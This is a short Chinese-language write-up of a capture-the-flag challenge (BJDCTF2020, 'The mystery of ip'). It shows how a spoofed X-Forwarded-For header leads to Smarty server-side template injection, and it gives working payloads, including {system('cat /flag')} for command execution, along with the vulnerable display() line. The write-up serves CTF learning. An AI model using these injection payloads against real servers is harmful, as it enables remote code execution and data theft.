[BJDCTF2020]The mystery of ip、

参考：PHP的模板注入（Smarty模板）

Step

根据提示，尝试伪造ip

X-Forwarded-For:1

发现回显也是1

所以可能是模板注入，尝试X-Forwarded-For:{config}

回显：

:  Uncaught  --> Smarty Compiler: Syntax error in template "string:{config}"  on line 1 "{config}" unknown tag 'config' <-- 
  thrown in <b>/var/www/html/libs/sysplugins/smarty_internal_templatecompilerbase.php

说明这个是Smarty模板

然后尝试：

查看版本
X-Forwarded-For:{$smarty.version}
获取flag
X-Forwarded-For:{system('cat /flag')}

成功得到flag

形成SSTI的代码是：

$smarty->display("string:".$ip)      // display函数把标签替换成对象的php变量；显示模板